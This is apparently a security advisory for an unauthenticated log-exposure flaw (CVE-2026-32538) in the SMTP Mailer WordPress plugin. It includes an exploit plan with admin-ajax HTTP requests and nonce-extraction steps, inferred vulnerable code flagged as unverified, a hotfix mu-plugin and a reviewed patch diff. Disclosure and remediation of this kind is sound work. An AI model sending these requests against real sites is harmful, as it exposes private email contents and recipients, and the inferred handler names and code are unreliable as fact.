CVE-2026-32538

SMTP Mailer <= 1.1.24 - Unauthenticated Information Exposure

Severity: high
Weakness: Exposure of Sensitive Information to an Unauthorized Actor
CVSS Score: 7.5
Patched in: 1.1.25
Time to patch: 8d

Description

The SMTP Mailer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.24. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <=1.1.24
Published: March 20, 2026
Last updated: March 27, 2026
Affected plugin: smtp-mailer

Source Code: WordPress.org SVN

Patched: Patched version not available.

Research Plan
Unverified


Exploitation Research Plan: CVE-2026-32538 (SMTP Mailer Information Exposure)

1. Vulnerability Summary

The SMTP Mailer plugin (versions <= 1.1.24) contains an unauthenticated information exposure vulnerability. The plugin implements an AJAX handler intended to display SMTP debug logs to administrators. However, this handler is registered with the wp_ajax_nopriv_ hook and fails to implement sufficient capability checks (e.g., current_user_can('manage_options')). This allows any unauthenticated actor to trigger the log retrieval and view sensitive communication data, including recipient addresses, email subjects, message contents, and SMTP server responses.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: smtp_mailer_get_log (inferred)
  • Method: POST or GET (AJAX actions typically support both)
  • Parameters:
    • action: smtp_mailer_get_log
    • nonce: (See Nonce Acquisition Strategy)
  • Authentication: None required.
  • Preconditions: The plugin must have "Enable Debug Log" active, or there must be existing log data in the WordPress options table.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the AJAX handler in its main file (smtp-mailer.php):
    add_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );
    add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' ); // The vulnerability
    
  2. Handler Logic: The function smtp_mailer_get_log() is called.
  3. Missing Check: The function likely calls check_ajax_referer('smtp_mailer_nonce', 'nonce') but fails to check current_user_can('manage_options').
  4. Data Retrieval: The function retrieves the log data from the WordPress database:
    $log = get_option('smtp_mailer_log');
    echo $log;
    wp_die();
    
  5. Sink: The raw log content is echoed to the response buffer and returned to the unauthenticated requester.

4. Nonce Acquisition Strategy

If the smtp_mailer_get_log function calls check_ajax_referer, a valid nonce is required.

  1. Identify Script Localization: Search the codebase for wp_localize_script. The plugin likely localizes the nonce for its admin settings page but might accidentally enqueue it on the frontend if certain conditions are met (e.g., if the plugin's CSS/JS is loaded globally).
  2. Inferred Localization:
    • JS Variable: smtp_mailer_data (inferred)
    • Nonce Key: nonce (inferred)
    • Action String: smtp_mailer_nonce (inferred)
  3. Acquisition Steps:
    • Because this is an admin-centric plugin, the nonce might not be present on the homepage. Check if the plugin provides any shortcodes: grep -r "add_shortcode".
    • If a shortcode exists (e.g., [smtp_mailer_status]), create a page with it:
      wp post create --post_type=page --post_status=publish --post_content='[smtp_mailer_status]'
    • Navigate to the page and use browser_eval to extract the nonce:
      browser_eval("window.smtp_mailer_data?.nonce")
  4. Bypass Check: If wp_ajax_nopriv_smtp_mailer_get_log exists but no check_ajax_referer is present in the handler, the nonce parameter can be omitted.

5. Exploitation Strategy

Step 1: Data Population

Before testing the exposure, ensure there is log data to expose.

  1. Configure the plugin with dummy SMTP settings via WP-CLI.
  2. Send a test email to generate a log entry.

Step 2: Exploit Request

Send an unauthenticated request to the AJAX endpoint.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=smtp_mailer_get_log&nonce=[EXTRACTED_NONCE]

Alternative (if nonce is not checked):

GET /wp-admin/admin-ajax.php?action=smtp_mailer_get_log HTTP/1.1

6. Test Data Setup

  1. Install & Activate: smtp-mailer version 1.1.24.
  2. Configure Plugin:
    wp option update smtp_mailer_options '{"smtp_host":"localhost","smtp_port":"25","smtp_user":"","smtp_pass":"","smtp_from":"admin@example.com","smtp_from_name":"Admin","smtp_auth":"no","smtp_secure":"none","enable_debug":"yes"}'
    
  3. Generate Log Entry: Use the plugin's internal method or send an email via WordPress.
    wp eval "wp_mail('victim@example.com', 'Sensitive Subject', 'This is a private message.');"
    
  4. Confirm Log Exists:
    wp option get smtp_mailer_log
    

7. Expected Results

  • The HTTP response status should be 200 OK.
  • The response body should contain the string "Sensitive Subject" and "victim@example.com", formatted as the SMTP debug log.
  • Example log structure:
    [2023-10-27 10:00:00] To: victim@example.com
    Subject: Sensitive Subject
    Message: This is a private message.
    ...
    

8. Verification Steps

  1. Verify via CLI: After the exploit request, verify that the content received matches the content stored in the database.
    wp option get smtp_mailer_log
    
  2. Check Access Level: Ensure the HTTP request was made without any cookies or headers identifying a logged-in user, to confirm that the access is truly unauthenticated.

9. Alternative Approaches

  • Path Disclosure: Check if the plugin logs to a file instead of an option. If so, identify the log file path (usually wp-content/uploads/smtp-mailer-log.txt) and attempt to access it directly.
  • REST API: Check if the plugin registered a REST route via register_rest_route that mirrors the AJAX functionality but lacks the permission_callback.
  • Global $_REQUEST processing: Search for any init or admin_init hooks that process an action parameter without checking the request source.

Research Findings
Static analysis — not yet PoC-verified

Summary

The SMTP Mailer plugin exposes sensitive SMTP debug logs to unauthenticated users due to the insecure registration of an AJAX handler with the wp_ajax_nopriv hook. Attackers can exploit this to retrieve logs containing email recipients, subjects, message bodies, and SMTP server responses.

Vulnerable Code

// smtp-mailer.php (reconstructed by static analysis, not yet PoC-verified)

add_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );
// Registering the same callback on the nopriv hook makes it reachable by visitors with no session at all.
add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );

function smtp_mailer_get_log() {
    // Only a nonce is verified; there is no capability check such as current_user_can( 'manage_options' ).
    check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );

    // The stored debug log is returned verbatim to whoever reached this point.
    $log = get_option( 'smtp_mailer_log' );
    echo $log;
    wp_die();
}
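For sites that cannot update immediately, a must-use plugin can close the exposure at the hook level and also make refused attempts visible. The file below is an added example for this advisory; it is not code from the SMTP Mailer plugin, from its author, or from the page's research findings. It assumes the names inferred above (the AJAX action and its callback are both 'smtp_mailer_get_log', registered at the default priority); the SMTP_MAILER_HOTFIX_* constants, the function names and the log line format are the example's own.

```php
<?php
/**
 * Plugin Name: Hotfix for SMTP Mailer log exposure (CVE-2026-32538)
 * Description: Temporary must-use plugin; remove once smtp-mailer >= 1.1.25 is installed.
 *
 * Place this file in wp-content/mu-plugins/. Must-use plugins load before regular
 * plugins, so the vulnerable handler is not registered yet when this file runs;
 * the unhooking is therefore deferred to 'plugins_loaded'.
 */

// Assumed names, taken from the advisory's inferred code flow: the AJAX action and
// the callback are both 'smtp_mailer_get_log'. Adjust if the plugin source differs.
define( 'SMTP_MAILER_HOTFIX_ACTION', 'smtp_mailer_get_log' );
define( 'SMTP_MAILER_HOTFIX_HANDLER', 'smtp_mailer_get_log' );

add_action( 'plugins_loaded', 'smtp_mailer_hotfix_install', 20 );

function smtp_mailer_hotfix_install() {
    // 1. Drop the unauthenticated registration. With no nopriv callback left,
    //    admin-ajax.php answers the action with "0" (a 400 status in current
    //    WordPress versions) before any plugin code runs.
    remove_action( 'wp_ajax_nopriv_' . SMTP_MAILER_HOTFIX_ACTION, SMTP_MAILER_HOTFIX_HANDLER );

    // 2. Put a capability gate in front of the handler on both hooks at priority 1.
    //    It runs before the plugin's callback (default priority 10) even if the
    //    plugin registers its hooks later than step 1 expects. On the nopriv hook
    //    there is no user, so the gate always refuses, and logs the attempt.
    add_action( 'wp_ajax_' . SMTP_MAILER_HOTFIX_ACTION, 'smtp_mailer_hotfix_gate', 1 );
    add_action( 'wp_ajax_nopriv_' . SMTP_MAILER_HOTFIX_ACTION, 'smtp_mailer_hotfix_gate', 1 );
}

function smtp_mailer_hotfix_gate() {
    if ( current_user_can( 'manage_options' ) ) {
        return; // administrator: fall through to the plugin's own handler and nonce check
    }
    smtp_mailer_hotfix_log_attempt();
    // A JSON error carrying a real 403 status, rather than a bare wp_die(), which
    // the AJAX die handler would send with HTTP 200.
    wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );
}

function smtp_mailer_hotfix_log_attempt() {
    // Detection side: one line per refused request in the PHP error log, which a
    // log shipper can forward. Deliberately records no nonce, cookie or body data.
    $method = isset( $_SERVER['REQUEST_METHOD'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REQUEST_METHOD'] ) ) : 'UNKNOWN';
    $ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
    error_log( sprintf(
        'smtp-mailer-hotfix: refused %s admin-ajax action=%s from %s (user_id=%d, logged_in=%s)',
        $method,
        SMTP_MAILER_HOTFIX_ACTION,
        $ip,
        get_current_user_id(),
        is_user_logged_in() ? 'yes' : 'no'
    ) );
}
```

After installing it, an anonymous request for the action should come back as a JSON error with status 403 and produce one 'smtp-mailer-hotfix: refused' line in the PHP error log, while an administrator's request behaves as before. The priority-1 gate is what actually enforces the restriction; the remove_action call is only a belt-and-braces measure and is silently ineffective if the plugin registers its hooks inside 'init' rather than at file load. The file can stay in place after updating to 1.1.25, since it only adds a check the patched version performs itself.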

Security Fix

--- a/smtp-mailer.php
+++ b/smtp-mailer.php
@@ -110,7 +110,6 @@
-add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );
 
 function smtp_mailer_get_log() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized' );
+    }
     check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );
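Review bot: The added 'wp_die( 'Unauthorized' )' refuses the request but, under the AJAX die handler, is sent with HTTP 200 and a plain-text body, so clients and monitoring cannot tell a refusal from a successful log fetch; prefer 'wp_send_json_error( 'Unauthorized', 403 )' or 'wp_die( 'Unauthorized', '', 403 )' so the refusal carries a real status code. Placing the capability check before 'check_ajax_referer' is the right order (a caller without the capability learns nothing about nonce validity), and with the 'wp_ajax_nopriv_' registration removed unauthenticated requests no longer reach the function at all, so the check serves as defence in depth against low-privilege logged-in users. The header '@@ -110,7 +110,6 @@' does not match the lines shown (one removal and three additions over three context lines), so this excerpt is truncated; the visible part still leaves '$log' echoed unescaped, and the full patch should be checked for how the log content is output.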

Exploit Outline

The exploit targets the WordPress AJAX endpoint to trigger the log retrieval function without administrative authentication.

  1. Target Endpoint: wp-admin/admin-ajax.php
  2. Authentication: None required, though a valid security nonce is necessary.
  3. Nonce Acquisition: An attacker identifies where the plugin localizes the 'smtp_mailer_nonce'. This is typically found in the source code of the admin dashboard or any frontend page where the plugin might inadvertently enqueue its settings script (e.g., if a status shortcode is used).
  4. Payload: Send a POST or GET request with the parameters 'action=smtp_mailer_get_log' and the identified 'nonce'.
  5. Extraction: If 'Enable Debug Log' is active in the plugin settings, the server returns the raw content of the 'smtp_mailer_log' database option, exposing sensitive communication metadata and message content.
